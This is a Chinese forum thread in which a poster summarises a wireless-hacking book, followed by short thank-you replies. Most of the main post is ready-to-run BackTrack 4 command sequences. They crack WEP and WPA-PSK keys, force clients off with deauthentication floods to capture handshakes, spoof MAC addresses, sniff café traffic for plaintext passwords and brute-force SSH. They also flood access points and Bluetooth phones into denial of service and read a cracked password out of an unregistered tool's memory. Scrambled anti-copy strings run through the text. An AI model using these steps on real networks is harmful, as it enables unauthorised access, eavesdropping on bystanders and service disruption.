搜索
格西欧解决方案
树熊
查看: 8907|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3715

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。
) u& i7 K- o6 F" ^/ \% I9 ^$ J* F! m  Y, Y* A3 m
以下所有操作均在BackTrack 4中进行。
- m" D* X+ [# _9 p2 y
1 Z- ~: K. c3 O7 F2 L9 S; \+ A
) ~9 }4 ?6 g# I) a# n* O9 ]+ B) @无线WEP加密P解:. q7 m' x% x1 N. d  K& q$ D
% ~- ?( u) A# R* q* |& `% M
注入P解:
8 X# C% `# k" u# ~8 A) W6 k; l3 E
8 G" @7 d" a' S! L, T# aifconfig
1 ^- q9 a0 h$ e9 ]8 ]- W
0 }4 R0 t1 [7 s, fifconfig –a
/ v2 G% H! v& w1 d5 n$ |8 v# G' G. q4 A& y- ~3 m! C9 P
ifconfig wlan0(无线网卡) up: R, H% B" I" ^9 y& B

% D, c( T& e$ F. L# l1 K- Bairmon-ng start wlan0  ]7 L  }; r! l$ k4 I3 d
7 \; t; O6 g( v4 x4 m' ~& c
airodump-ng mon0/ e' M* r( k) k# ?

$ Y, x* p* C( m4 W! vairodump-ng --ivs –w ivsfile –c 频道 mon0或" {: p* y9 H2 o# o0 i8 g

; D% }; r* [1 X" k6 Wairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon06 M, z4 z! R& Y
- M) R5 l+ ?5 A1 k" X
aireplay-ng -3 –b BSSID –h Station mon0
0 B! D2 e, q9 K2 q5 i  ~- ~1 ^3 s( a* L/ y+ s% D: m- m* \
aircrack-ng ivsfile-01.ivs3 Z) F& n1 m0 x/ _  |) X6 w
8 Z' p; V$ e+ Y! C0 u
虚连接P解(适用于无客户端连接APP解)- ^7 m* z# C1 d5 F% |' Q) q

, ~8 ^* O. ?3 Vifconfig
0 y5 ?# s: Z9 {( u' B9 `; B& D
7 I3 L& g% h4 R7 X1 vifconfig –a
+ m! @; j0 @% j& X) d' M9 H0 c% B. v8 M& y) u) e' B7 G8 B: a4 M
ifconfig wlan0(无线网卡) up
" ^2 q! ]1 P! B* J
. K5 }. `  @4 n0 mairmon-ng start wlan0
, \# p1 ~1 H; E: D* h& Z4 ~
( P9 T: X/ z  Z/ Q% pairodump-ng mon0  \7 b; h3 M  @3 Z  }2 b2 d1 x

# X8 O4 ]0 C# Sairodump-ng --ivs –w ivsfile –c 频道 mon0或
2 ^4 K' y/ c0 m% L4 c2 Z9 ]5 Y0 o4 _+ V/ j
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0+ H  o( z5 t+ }2 U, H0 B4 b& r
0 g# g, X' E8 I6 F
aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0& I* w- G- P! w( S/ P4 ~

. O6 ~. D. ]! w/ daireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
7 N' p& O* n- _( H6 ~3 a# M6 G2 x! h( ~2 \
aircrack-ng ivsfile-01.ivs- k. X% f1 O2 S4 l- ^" C  v3 O3 @0 Y

. n7 J$ ^* k- m5 `. r8 R! R7 p- X5 i" P5 s* x5 E' h  k* |* j
还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。
; ]8 M& R& ]3 a" w  R8 M
& G$ t8 x3 q& D0 ~# t: i# X* E9 A* R9 u0 r5 }
WPA-PSKP解; A- }- ?5 X/ Q
+ \7 ^% |3 C# T- k) w& O
ifconfig" {  \' S( I$ F6 @" X$ _
) ]: E/ h% t6 l1 h$ |/ C# K$ I
ifconfig –a
# ]; M2 r/ u- A0 P* S5 n+ I/ J  n2 t
ifconfig wlan0(无线网卡) up" ?, g/ ]& k% z5 P1 m/ K* t
, G% {; ]. T6 Q. F% `, @+ S3 K% B1 Q
airmon-ng start wlan0- {. i" ]& P5 Q* @, Z
$ m7 O9 j9 J6 b, `1 f7 m4 f
airodump-ng mon0$ e5 @' c  f5 e

: C' H; \0 \8 s3 Q; M! v* I* gairodump-ng –w capfile –c 频道 mon04 s1 H6 m* W& v- d) u$ U
  @9 q3 ?; Y4 Z' Z/ K: X  W. D
aireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包
# ]3 k0 G$ k! x, o6 N) S2 r) w, e# P( z5 i$ \* Y
aircrack-ng –w Dic capfile-01.cap或
" I* k$ p2 T# r" Z. T6 d" D
: s/ r6 h( y; R. `5 J9 \cowpatty –f Dic –r capfile-01.cap –s SSID
. \0 F% A1 b3 G! a  o+ w3 [" g2 X: b9 p- |: }
cowpatty –d HashTable.Hash –r capfile-01.cap –s SSID! `# ^7 x8 J8 Y4 t" w+ s

% h2 p2 t6 [5 e- |& q9 ^) y$ p7 e* ~傻瓜式P解软件SpoonWPA。
$ g- H1 ~5 G' I- ?; @1 b3 F  \3 a0 |: C
BT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst& e& u' s4 {( i  h5 f3 k
% @+ R" k5 d$ x' ]" J9 c, f* @  [. ]

( A! a. S$ [1 R1 g3 _; i字典文件的生成和上传4 Q2 Q+ |5 p0 R
4 A) k6 s' x( F% F" E; H0 a
在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
$ _! y! L0 \! z" \+ y. h  r2 O# T' N  V1 O
0 K' X: ]8 q. r% P* {& m
BT4下开启Tftp:Services—TFTPD—start TFTPD
4 J# |3 g; |8 l/ y: B6 l
; |/ l' y8 z7 V: C- g在Windows的CMD中运行 tftp –i IP put **.dic2 y5 ]( L! T2 u4 e+ l% d
, a$ T2 p  K" J' h3 x

5 y; j3 O+ h1 |4 hBT4下开启SSH:Services—SSH—start SSH2 ?8 E8 f( ]  D' P1 _' ~
) r" V1 r& }7 k2 @/ e/ ~
Windows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
4 B# v: o. Z  Y% @6 K2 G8 p# Y) w2 K* O0 \7 X1 U* w5 O% e0 Y
/ Z9 }9 y0 P+ c+ k
AP限制MAC时的解决
$ M, r3 [1 w; e* I" \' r* @. B' S1 B; a. [  M5 o1 i
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
# F* I3 F0 B3 O6 Y% T' n! x. @. I; g. `. h6 S- d. v6 I
ifconfig wlan0 hw ether NewMAC/ }. ^3 J$ a/ I2 k

2 N; C$ g1 @9 u' X# {" i9 k  A: D7 W
关闭SSID广播的AP探测:6 T4 ?+ q7 B6 f. t

" [1 _  X: b% p1.     Deauth攻击:
, k5 m6 w* x; d, f2 d$ u- v4 f, M
airodump-ng mon0
+ b4 c3 u$ ~, c! k$ I1 U+ g. M7 G1 K
aireplay-ng -0 10 –a BSSID –h Station mon0# g  u1 g8 f' J& M8 N; t' U
5 N- h' O! P' S( i8 j! ?* V# v5 e
2.     抓包分析
0 A2 U; v7 p5 S4 m, A
5 t! _, Q# _5 T" S; FOmnipeek
4 ~% T& R3 h% P! b2 c  x
1 r( y  a) o  i( Y8 g! f9 oTcpdump –n –e –vvv –i 网卡名" H# M# ^# C9 X4 \; l

: K% _8 n) G8 e9 g! ]/ Q+ _" E3.     暴力P解
8 W- E' U- }7 m9 l* m7 z8 ^
& z' c) J; k% q9 c2 l* ], mCharon 1.1暴力P解
: N& A# i+ X  Q9 C
- r* I% d2 M- c- d9 V
+ |' r7 L% o# A9 A% B: H" `" [无线加密数据包的解密
) _4 F; P$ d  l+ J% ^& ?; ^
  F" ]7 O5 r9 y7 [: b3 k: R+ J8 S+ x* f9 l0 i
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
6 W6 [% r" `  U  n) ~; M: ~! y) k
FilterNS     DNS解析数据包: S- _# h; k) A" l2 d% e
1 u! a) \6 M; h, C( H% x1 d
Filter:HTTP    WEB访问数据包! K# j! J2 w, u  y* C- v: X( ^" [
  b" b& C" c; A2 N* W
Filter:msnms   MSN' ?, U% ^& y% o

) F1 }2 Z, E" t: Q6 a. Q$ |: qCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。# _- W: ^1 j& u* u- P
6 s3 O9 I7 e& A/ F4 r! p$ m" i3 h
使用airdecap-ng解密:! L' y; n. P  ]8 F

! @4 U3 t, a  r7 }- U5 jAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap# K- S; C. L2 }3 l% O6 p* m

/ p3 t% ?% z$ @% Y: P: R& ?- t" b
9 m; ]9 p% @! L  a7 m% e咖啡馆中无线数据截取(开放式无加密AP)9 n- K- Q; L. v4 z1 c5 R5 t' T& \
, P7 r. M$ a  z
1.Airodump-ng –w data –c频道 mon0
) L5 K* ]" O5 |) _3 k, G, ~+ Y; }) b( ]& f; R6 a
2.使用WireShark打开分析. v4 Q9 Z& J6 H
: q' A( E$ N/ u: A* ]
7 o0 z5 ^% j. V5 w" W) ^/ h2 u/ b
BT4下的渗透工具:9 t# ?) ^+ B7 W) _

0 u" @4 G0 T8 O; ~+ hnmap –sP IP/24        判断C段下存活的主机 8 b2 r5 [6 e7 U) e

3 ~  q9 d! F8 K6 p1 l) `nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
8 e9 f/ h* D' n) y  U4 [6 Z
# y. L8 ?- u7 @2 u. vnmap –vv –sV IP –p port   指定端口的详细信息。。。
9 t" ~. F6 q7 b* a  a4 b9 }% Z; q, a  `' [5 M9 g
namp –O IP/24    判断主机的系统版本4 {0 {  s. d  A) Y
8 `, B' j6 D; H8 Q2 ]7 Q* g
5 O9 G6 n, T6 t, w5 w& z: H
GUI 版nmap:Zenmap % o  T0 E# l: m; h. ?2 H
; O5 h- j9 b1 z6 b- j

) G4 ^8 H! k+ u' ^$ O" d& g2 PAmap使用:amap –B IP port) F+ y& x5 z4 g; `' X. @/ G; K9 }

, ?5 j+ a9 T# ~' O" y+ {4 P6 w6 YNbtscan(扫描Windows网络NetBios信息):; x% j# U& M' S0 E. M# ]
: l3 Q& b1 t" l6 E# q+ ^0 K" L2 f
nbtscan –v –s : IP/24! r1 T" j: W6 `7 p* w

# T5 l5 f( B& S* c" m$ s) P6 Znbtscan –r IP* z3 V9 N/ o+ @+ c1 t! Y" k
% E! v0 O3 n, v7 [4 @$ E  j$ s( N
9 \4 H4 D+ S8 M( |, B1 t9 D0 n+ I4 ^
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.4 L( W( w% d5 `1 _6 T* g/ m& b' p

; ~# y: U8 N# ]  E' x( ]2 Q" E( S+ M# R, F
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)2 O& W& z+ X( K2 |
- q  N  p- o$ L4 _& u. T  J+ \
BruteSSH: ./bruthe.py –h IP –u Username –d Dic% X7 W! i6 J" j3 e# f: D0 d

1 P2 u7 G2 I1 a  Z, tMetasploit3使用
0 A3 c! w- S7 G# y% l无线D.0.S
, s1 ]* n2 c& o/ F+ O+ v- `5 p1 N- |& M" u9 L* f6 X- V
  t- _: Y5 Y" k* J! e3 s- @1 a
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)* k; V8 K# D+ n2 m/ x! {6 O+ z/ v

$ d" `8 K' a1 X, h. R0 d: t# b) qairmon-ng start wlan0
! S# s3 |3 R* |: u. b. h
: _, Q- }/ X  n" b+ i" F9 E% I) cairodump-ng mon0
2 R  s! X6 w+ W$ Y5 p5 |8 F/ F" i' E& i. F8 l+ U$ ?
mdk3 mon0 a –a BSSID
8 `# G; l7 \) z5 h  Z/ x+ Q
& P' M3 C8 S) Z- s6 E* u: |对所有的AP攻击:mdk3 mon0 a
$ A( r$ R; p+ ?3 h% @- D+ z" z9 Q0 \0 M" N8 P- C

; U8 \7 [; g7 L9 KDeauth Flood 攻击5 S: x4 c' {- l8 x5 w7 |6 r7 s9 }

5 U9 L' w! c5 I0 zmdk3 mon0 d –c Channel
7 K6 ?& W3 D- Y+ u/ g/ h# ^4 ^  z, @" o5 ]- G: c
图形化D.O.S攻击:Charon! M( o! r  s5 _
4 f; r% T5 B2 ]: e

1 }. V( e& A# ^/ t1 ^/ \: l# z3 \1 [当受到攻击时,使用Wireshark抓包可以看到异常信息。
7 @' J& o. u9 Y( p/ e, C2 B; l4 P3 j; M- B. c6 g  y5 j8 U
9 ~  X" O+ U- W) L0 ?3 n3 j
WPA-PSK高速P解5 ?/ e$ W3 A' M8 y! M
: f; Q  Y3 S$ P! U" a( h2 I# u6 U
1.       WPA-PSK PMK Hash TablesP解/ E& e9 s7 B9 ^0 m( J2 l7 n
' H4 B, S3 A& z: B& f* [
Cowpatty –d HashTable.hash –r ***.cap –s SSID3 @7 U6 h# u# o/ n

9 Y" l% l5 Y5 x% X# t5 b8 z$ Z, GHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
/ r& u8 Z( x" K) u+ N8 f8 o6 f' x' I2 X2 M1 V! D7 o
2.       GPU辅助高速P解
% Y0 Q8 Z0 x! D/ v) i  m1 U
4 ~2 B) F1 o! C& L使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。
2 z( m4 f3 n: K9 \
/ O3 q! v6 k7 X" u3.       分布式P解
& B# P( i  g4 n2 @
6 a: ]( z0 ?, t0 j1 K4 @, f" {# K# V, Q" ?% v: }+ ]4 P& H( Z" {
AP的伪造
0 f! c) }. Z; X+ L  q2 T# H( B* K; v. [9 n1 s- I
把AP的MAC改成目标AP的MAC- ]+ C) t( G6 p: \

* A( n& A! H5 f4 P' P0 r+ [网卡软AP: K1 ^% i' q) V5 C# d/ ~7 P

& s, r/ ]( g# l8 E8 |. P
' e2 O- @& h. z9 M) W伪造大量虚假AP信号:
' ^8 g& Y) e2 }
& T0 G" ]8 ]. A5 M6 Z随机SSID:mdk3 mon0 b –g –c 频道 8 T5 R( j7 j: J+ T8 \, u" O/ M
! Q! }3 a6 G; a0 K# |+ R8 M
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度% E+ k  {, c: |% u9 F  j: c
6 m# j7 c, o" a: ~! t; H

3 D% g1 J8 [/ v/ p- z/ n, UWar-Driving" ]! {. d3 Y9 z, n1 o
% }0 P5 O" _9 H: o+ i- a6 ]
热点地图绘制$ [! N/ E# w# K- i0 [  t  S
; r! g: U8 Y# [8 B4 d, p& \) i% |
Windows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
+ F  R% d" O( n( X4 D4 [; M2 I  T7 X6 i' d) |5 J0 j

* @5 R) s5 \4 N- |+ {8 UNetstumble
/ S' p' u9 s# P0 W9 ]
9 E! y4 r: U. R# ^) q
3 L" S. A7 @! X0 G蓝牙Hacking, q8 k4 i9 ?- w0 K# n# Z8 Z9 h

7 g; o3 B2 s* e7 UWindows下的Blue Soleil工具
9 w& C) x) w4 r1 l1 R) F4 s
4 t8 T& G1 @0 t9 j& o: TBT4:, B/ R  @4 ^8 T
( }9 A- k: @% ]1 X; l- z8 K- _
hciconfig 查看蓝牙适配器
) F1 w8 C8 ]5 {# t0 y
6 }) [$ u, f/ f2 b1 B1 I. @hciconfig hci0 up 载入蓝牙适配器: M) T. a1 M; v1 j
* J7 @+ L) M9 b/ [+ F8 }/ c
hciconfig hci0 class 蓝牙适配器详细信息
! d% `/ V/ y( r6 I. F5 x. X4 E% F$ f
* }1 d: A" N9 b( T- t2 B+ Z4 g6 q4 [
hcitool(扫描蓝牙)7 f0 H9 A* n) r4 Q$ d9 o9 T! e
9 _6 m- \& [7 f
hcitool –i hci0 scan4 \. M* v$ L( ~( K+ `

! g" Y) W* Y9 nBTscanner(扫描蓝牙)
5 z3 g( C; l7 ~9 b2 ]: n3 s8 D% ~, _; O

8 V3 X4 u3 W" R, O6 K. x# }蓝牙攻击:
3 _0 `" t# q( \% A) B" d1 j/ C5 A. v6 i$ E% Z- f4 Q1 r. O+ d8 Y
BlueBugging (适用于BlueTooth V1.1的手机)0 S6 m1 w1 Z9 S+ K/ d
, w/ x0 E" o7 o6 V  O
Bluebugger工具:1 ^: r4 ^+ N; c6 S

8 d& ?1 u. S% {6 l9 TBulebugger –a HD_Addr info  o8 g8 d3 W' S
( F; T& |! x# H8 y: D
0 x# H# E% y2 @, C  o* X1 f$ ?
BlueJacking$ B  ?( S/ P3 A% y

* p2 |* L0 V1 B# E% l9 B/ x0 b实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。& r3 m0 B$ j$ @. L2 W4 h: l! I. [
6 q0 f4 l/ S8 ]0 S" i4 w
) D0 o! c* ]( U9 W' e
HD_Addr修改:
0 Z. w/ {, l  z# n: M+ G; g
0 J" a0 o- Q, @, r& ^" ]; ?& pBdaddr工具
: y$ o0 \3 k) r: u1 _& c. c1 v2 M0 ^
6 C2 G) Y  l& @+ i3 n0 R3 \bdaddr –i 蓝牙设备名 新HD_addr
6 @8 E# o1 _4 r- b  D+ Y  w
( b- B8 c5 S4 W0 R. _" ]& Q$ z' B+ `! O0 H8 v
蓝牙D.O.S* z) ]& _( i( ^

/ H9 C7 T# w, V& zl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务% V  f7 f! M2 |$ U
/ B" b. |8 K7 n* R6 C! V
hciconfig
4 o; G/ [1 _) K' ?0 F+ H6 S9 t
1 b% ^. N( d: C; T# D$ c; [2 `3 ohciconfig hci0 up( V7 `, c8 ~4 [* T* l( Q$ P* b7 n) K) A
2 B6 J' o! I/ O# ?
hcitool –i hci0 scan
$ Z1 X# I7 N7 @( _6 J4 @( o. I
$ c. y5 V' [- e9 W5 z" C6 ol2ping –s 10000 –目标MAC3 J9 C6 M# W( p& A$ P5 |
# f: H/ y3 o% |1 r
" K& }0 e6 [0 Z8 j) o- {
不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
# ^1 Z) x9 c0 j3 v3 q2 |% M3 h- i1 M" G$ A0 ~; r  e5 v  k
./fang –r ************-############ -s
2 G0 D/ q; j! ~9 i3 E& M( N0 p" V7 H5 z8 w, F1 {) h/ N
暴力P解************-############的蓝牙设备
2 ?8 F5 [0 ?- d: D) a& u3 o7 a  Y" D+ D7 |9 a5 E3 z3 `/ v, t
./fang –l 各厂商BD_Addr分配' \* y! T  h+ E
! b) p$ C7 l. o6 {4 {5 O

0 ~! o# Z! c5 M+ v% y- I: }" oWifiZoo使用0 C) @: }- W5 U) r8 s8 C
- L, j7 W# Q1 r0 k- d
./wifizoo.py –c Capfile
( t5 X' {: |- y8 N4 T% ^" k$ D6 _6 T
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

880

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2265

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1114

积分

上尉

签到天数: 3 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

256

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

701

积分

中尉

该用户从未签到

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。
% y' f- |- ]0 L  m1 U- H: \借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
9 o. x' F. a1 E  R2 _呵呵 其实也不贵 21块 快递再一点
% V# i/ V* M+ ]# e4 S, E9 k6 [我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

关闭

从旁人的错误中可以学到聪明 上一条 /1 下一条

手机版| Archiver| 无线门户 ( 粤ICP备11076993 )      小黑屋 | 免责声明

GMT+8, 2014-11-1 08:04 , Processed in 0.229617 second(s), 36 queries , Gzip On .

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表